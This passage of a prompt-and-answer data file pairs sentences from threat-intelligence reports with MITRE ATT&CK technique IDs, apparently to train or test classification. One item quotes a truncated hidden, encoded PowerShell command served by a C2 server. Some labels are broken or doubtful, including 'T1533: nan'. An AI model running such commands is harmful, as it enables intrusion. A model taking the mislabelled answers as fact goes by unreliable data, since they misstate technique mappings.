Side-by-side of the lure images within ThreeDollars in the October 2017 and the January 2018 attacks   Superficially, we can immediately see the images are quite similar, but with some glaring differences### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BRONZE BUTLER typically use ping and Net to enumerate systems.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In this scenario, adversaries attach a file to the spearphishing email and usually rely upon User Execution to gain execution.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has tricked unwitting recipients into clicking on malicious hyperlinks within emails crafted to resemble trustworthy senders.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Catchamas steals data stored in the clipboard.### Assistant: T1115: Clipboard Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Avaddon checks for specific keyboard layouts and OS languages to avoid targeting Commonwealth of Independent States entities.### Assistant: T1614: System Location Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NanHaiShu executes additional VBScript code on the victim's machine.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Other variants have set the following Registry keys for persistence: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\imejp : self and HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAStorD.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The group has also used other obfuscation methods, including Base64 obfuscation of VBScripts and PowerShell commands.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dtrack has used cmd.exe to add a persistent service.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Orz can gather a process list from the victim.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Egregor has used DLL side-loading to execute its payload.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LockerGoga has been signed with stolen certificates in order to make it look more legitimate.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.### Assistant: T1584: Compromise Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Staging of capabilities can aid the adversary in a number of initial access and post-compromise behaviors, including : * Staging web resources necessary to conduct Drive-by Compromise when a user browses to a site.### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Users may be subjected to social engineering to get them to click on a link that will lead to code execution.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Malware features Remexi boasts features that allow it to gather keystrokes, take screenshots of windows of interest (as defined in its configuration), steal credentials, logons and the browser history, and execute remote commands### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PoetRAT has executed a Lua script through a Lua interpreter for Windows.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework., ShellExecute### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BUGJUICE defaults to TCP using a custom binary protocol to communicate with the C2, but can also use HTTP and HTTPs if directed by the C2### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SUNBURST collected a list of service names that were hashed using a FNV-1a + XOR algorithm to check against similarly-hashed hardcoded blocklists.### Assistant: T1007: System Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The adversary may then perform actions as the logged-on user.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot has come with a signed downloader component.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Modifying infrastructure components may also allow an adversary to evade detection and remove evidence of their presence.### Assistant: T1578: Modify Cloud Compute Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CoinTicker creates user launch agents named .espl.plist and com.apple.random string.plist to establish persistence.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BabyShark has a PowerShell-based remote administration ability that can implement a PowerShell or C# based keylogger.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Trojan.Mebromi performs BIOS modification and can download and execute a file as well as protect itself from removal.### Assistant: T1542: Pre-OS Boot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kobalos can chain together multiple compromised machines as proxies to reach their final targets.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Msiexec.exe is digitally signed by Microsoft.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rocke has executed wget and curl commands to Pastebin over the HTTPS protocol.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Matryoshka can establish persistence by adding Registry Run keys.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Penquin can execute the command code do_download to retrieve remote files from C2.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Trojan.Karagany can create a link to itself in the Startup folder to automatically start itself upon system restart.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dok uses AppleScript to create a login item for persistence.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater has performed credential dumping with LaZagne.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The bootkit shares code with some variants of BlackEnergy.### Assistant: T1542: Pre-OS Boot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Group has sent emails containing malicious links that require users to execute a file or macro to infect the victim machine.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group malware deletes files in various ways, including ""suicide scripts"" to delete malware binaries from the victim.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Versions of OSX/Shlayer pass encrypted and password-protected code to openssl and then write the payload to the /tmp folder.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The rest of MirageFox functions similarly to previous malware created by APT15, first collecting information about the computer like the username, CPU information, architecture, and so forth### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SEASHARPEE can download remote files onto victims.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lucifer can check for specific usernames, computer names, device drivers, DLL's, and virtual devices associated with sandboxed environments and can enter an infinite loop and stop itself if any are detected.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RTM has used Registry run keys to establish persistence for the RTM Trojan and other tools, such as a modified version of TeamViewer remote desktop software.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Group has obtained and used a variety of tools including Mimikatz, PsExec, Cobalt Strike, and SDelete.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Socksbot can write and execute PowerShell scripts.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Volgmer can delete files and itself after infection to avoid analysis.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT37 has a Bluetooth device harvester, which uses Windows Bluetooth APIs to find information on connected Bluetooth devices.### Assistant: T1120: Peripheral Device Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Misdat network traffic is Base64-encoded plaintext.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Valak has the ability save and execute files as alternate data streams .### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SMOKEDHAM has used Google Drive and Dropbox to host files downloaded by victims via malicious links.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TeamTNT has disabled iptables.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 performed network scanning on the network to search for open ports, services, OS finger-printing, and other vulnerabilities.### Assistant: T1046: Network Service Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PolyglotDuke can retrieve payloads from the C2 server.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DEATHRANSOM has the ability to use loop operations to enumerate network resources.### Assistant: T1135: Network Share Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The RIPTIDE exploit document drops its executable file into the C:\Documents and Settings\{user}\Application Data\Location folder while the HIGHTIDE exploit document drops its executable file into the C:\DOCUMENTS and SETTINGS\{user}\LOCAL SETTINGS\Temp\ folder### Assistant: T1533: nan" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT3 has a tool that looks for files and directories on the local file system.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Silence has used Windows command-line to run commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mustang Panda has sent malicious links directing victims to a Google Drive folder.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN8 harvests credentials using Invoke-Mimikatz or Windows Credentials Editor .### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has obtained and used open-source tools like Koadic, Mimikatz, and Responder.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This spawns the hidden embedded malicious LNK file in the document### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The main function gets pertinent strings to communicate with its C2 by calling a sub-function with a specific number that the sub-function uses as a case within a switch statement to decrypt the desired string### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rising Sun has used HTTP for command and control.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN7 has harvested valid administrative credentials for lateral movement.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework., sc query### Assistant: T1007: System Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework., pbpaste ### Assistant: T1115: Clipboard Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,While use of Virtualization/Sandbox Evasion may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.### Assistant: T1480: Execution Guardrails" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 has used hidden or non-printing characters to help masquerade service names, such as appending a Unicode no-break space character to a legitimate service name.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,starts a rootkit from a malicious file dropped to disk.### Assistant: T1014: Rootkit" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Malicious AppInit DLLs may also provide persistence by continuously being triggered by API activity.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig has used various types of scripting for execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In at least some of these recent attacks, Buckeye used spear-phishing emails with a malicious .zip attachment### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SpeakUp can perform brute forcing using a pre-defined list of usernames and passwords in an attempt to log in to administrative panels.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sibot has queried the registry for proxy server information.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Additionally, adversaries may use auditpol and its sub-commands in a command prompt to disable auditing or clear the audit policy.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BlackEnergy has searched for given file types.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TeamTNT has the curl command to send credentials over HTTP and download new software.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries could use shortcuts to execute their tools for persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Equation is known to have the capability to overwrite the firmware on hard drives from some manufacturers.### Assistant: T1542: Pre-OS Boot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ferocious Kitten has conducted spearphishing campaigns containing malicious documents to lure victims to open the attachments.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Misdat is capable of deleting Registry keys used for persistence.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KGH_SPY has the ability to set the HKCU\Environment\UserInitMprLogonScript Registry key to execute logon scripts.### Assistant: T1037: Boot or Logon Initialization Scripts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ramsay can collect Microsoft Word documents from the target's file system, as well as .txt, .doc, and .xls files from the Internet Explorer cache.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also create or steal code signing certificates to acquire trust on target systems.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leviathan has utilized OLE as a method to insert malicious content inside various phishing documents.### Assistant: T1559: Inter-Process Communication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Frankenstein has used spearphishing emails to send trojanized Microsoft Word documents.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can conduct peer-to-peer communication over Windows named pipes encapsulated in the SMB protocol.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GoldMax can spawn a command shell, and execute native commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task.### Assistant: T1205: Traffic Signaling" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Additional bypass methods are regularly discovered and some used in the wild, such as: * eventvwr.exe can auto-elevate and execute a specified binary or script.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.### Assistant: T1596: Search Open Technical Databases" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT-C-36 obtained and used a modified variant of Imminent Monitor.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky has obtained and used tools such as Mimikatz and PsExec.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Taidoor can use a stream cipher to decrypt stings used by the malware.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LiteDuke has the ability to check for the presence of Kaspersky security software.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Deep Panda uses net.exe to connect to network shares using net use commands with compromised credentials.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Network protocols that use asymmetric encryption often utilize symmetric encryption once keys are exchanged.### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BADFLICK has download files from its C2 server.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EVILNUM has used the malware variant, TerraTV, to run a legitimate TeamViewer application to connect to compromrised machines.### Assistant: T1219: Remote Access Software" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,4H RAT has the capability to obtain file and directory listings.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BadPatch attempts to detect if it is being run in a Virtual Machine using a WMI query for disk drive name, BIOS, and motherboard information.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Grandoreiro has been spread via malicious links embedded in e-mails.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cyber threat groups’ access to the media organization’s networks could potentially provide the government advance warning on upcoming protests, information on pro-democracy group leaders, and insights needed to disrupt activity on the Internet, such as what occurred in mid-2014 when several websites were brought down in denial of service attacks.[8] Threat Actors Use Spear Phishing Written in Traditional Chinese Script in Attempted Intrusions In August 2015, the threat actors sent spear phishing emails to a number of Hong Kong-based media organizations, including newspapers, radio, and television### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Duqu was an early example of malware that used steganography.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windows Management Instrumentation WMI is an administrative framework that is built into every version of Windows since 2000### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NETWIRE can issue commands using cmd.exe.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WIRTE has used PowerShell for script execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Microphone, Voice IP applications### Assistant: T1123: Audio Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The group has also sent spearphishing emails that contained malicious Microsoft Office documents that use the “attachedTemplate” technique to load a template from a remote server.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TajMahal has the ability to steal data from the clipboard of an infected host.### Assistant: T1115: Clipboard Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DropBook can communicate with its operators by exploiting the Simplenote, DropBox, and the social media platform, Facebook, where it can create fake accounts to control the backdoor and receive instructions.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole can sort and collect specific documents as well as generate a list of all files on a newly inserted drive and store them in an encrypted file.### Assistant: T1119: Automated Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Honeybee uses a dropper called MaoCheng that harvests a stolen digital signature from Adobe Systems.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SLOTHFULMEDIA has collected system name, OS version, adapter information, memory usage, and disk information from a victim machine.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windigo has used a script to detect which Linux distribution and version is currently installed on the system.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,On January 1, 2017, we observed this URL responding to the above HTTP request with the following data:powershell.exe -exec bypass -window hidden -noni -nop -encoded JABjAG8AbQBtAGEAbgBkACAAPQAgACcAVwB3AEIATwBBAEcAVQBBAGQAQQBBAHUAQQBGAE0AQQBaAFEAQgB5AEEASABZAEEAYQBRAEIAagBBAEcAVQBBAFUAQQBCAHYAQQBHAGsAQQBiAGcAQgAwAEEARQAwAEEAWQBRAEIAdQBBAEcARQBBAFoAdwBCAGwAQQBIAEkAQQBYAFEAQQA2AEEARABvAEEAVQB3AEIAbABBAEgASQBBAGQAZwBCAGwAQQBIAEkAQQBRAHcAQgBsAEEASABJAEEAZABBAEIAcABBAEcAWQBBAGEAUQBCAGoAQQBHAEUAQQBkAEEAQgBsAEEARgBZAEEAWQBRAEIAcwBBAEcAawBBAFoAQQBCAGgAQQBIAF..snip..As you can see, the C2 server responds with a PowerShell command that will run on the system### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use malicious code previously implanted in the boot loader, such as through the ROMMONkit method, to directly manipulate running operating system code in memory.### Assistant: T1601: Modify System Image" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ramsay can use UACMe for privilege escalation.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use a hidden file system to conceal malicious activity from users and security tools.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Access may also be gained through an exposed service that doesn’t require authentication.### Assistant: T1133: External Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These devices could include the motherboard, hard drive, or video cards.### Assistant: T1495: Firmware Corruption" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,IndigoZebra has compromised legitimate email accounts to use in their spearphishing operations.### Assistant: T1586: Compromise Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It is a preferred platform within data centers and the cloud for businesses, as well as an ongoing favorite when it comes to a majority of Internet-facing web and application servers### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stealth Falcon malware creates a scheduled task entitled “IE Web Cache” to execute a malicious file hourly.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value rather than the file’s real signature, an adversary can apply an acceptable signature value to all files using that SIP .### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ryuk has used the Windows command line to create a Registry entry under HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run to establish persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Since these applications may be routinely executed by the user, the adversary can leverage this for persistent access to the host.### Assistant: T1554: Compromise Client Software Binary" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Valak has used regsvr32.exe to launch malicious DLLs.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleSeed has the ability to execute its payload via PowerShell.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rather than creating and cultivating social media profiles Social Media Accounts, adversaries may compromise existing social media accounts.### Assistant: T1586: Compromise Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Character Description 0 File contains batch commands, it executes the batch commands 1 Rename the temporary file as .ps1 extension 2 Rename the temporary file as .vbs extension Table 2: BONDUPDATER Actions Figure 8 is a screenshot of BONDUPDATER’s DGA implementation### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tropic Trooper's backdoor could list the infected system's installed software.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ke3chang has obtained and used tools such as Mimikatz.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 used a compromised account to create a scheduled task on a system.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Typosquatting may be used to aid in delivery of payloads via Drive-by Compromise.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CORESHELL has established persistence by creating autostart extensibility point Registry entries in the Run key and other Registry keys, as well as by creating shortcuts in the Internet Explorer Quick Start folder.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Dacls Mach-O binary has been disguised as a .nib file.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sibot has installed a second-stage script in the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\sibot registry key.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RDAT can deobfuscate the base64-encoded and AES-encrypted files downloaded from the C2 server.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some versions of CozyCar will check to ensure it is not being executed inside a virtual machine or a known malware analysis sandbox environment.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 also encrypts the library used for network exfiltration with AES-256 in CBC mode in their macOS backdoor.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse Python commands and scripts for execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CHOPSTICK encrypts C2 communications with RC4.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BLINDINGCAN has obfuscated code using Base64 encoding.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,IcedID has established persistence by creating a Registry run key.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ComRAT can use email attachments for command and control.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bundlore uses the mktemp utility to make unique file and directory names for payloads, such as TMP_DIR=`mktemp -d -t x. OSX/Shlayer uses the mktemp utility to make random and unique filenames for payloads, such as export tmpDir=""$"" or mktemp -t Installer.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some versions of UPPERCUT have used the hard-coded string “this is the encrypt key” for Blowfish encryption when communicating with a C2.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Raindrop encrypted its payload using a simple XOR algorithm with a single-byte key.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LSA secrets are stored in the registry at HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carberp has used XOR-based encryption to mask C2 server locations within the trojan.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WastedLocker contains junk code to increase its entropy and hide the actual code.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Misdat is capable of downloading files from the C2.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This parameter transmits the agent_id to the C2 server to obtain commands the actor wishes to execute on the compromised system### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PLAINTEE has downloaded and executed additional plugins.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Freenki is used to gather information about the infected system and to download a subsequent stage payload### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,With a sufficient level of access, the net user /add /domain command can be used to create a domain account.### Assistant: T1136: Create Account" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Peppy can log keystrokes on compromised hosts.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT1 has created email accounts for later use in social engineering, phishing, and when registering domains.### Assistant: T1585: Establish Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BADNEWS has a command to take a screenshot and send it to the C2 server.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A second remote access tool could be uploaded at that point to redirect the host to the second-stage command and control server.### Assistant: T1104: Multi-Stage Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.### Assistant: T1557: Adversary-in-the-Middle" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MegaCortex has used rundll32.exe to load a DLL for file encryption.### Assistant: T1218: Signed 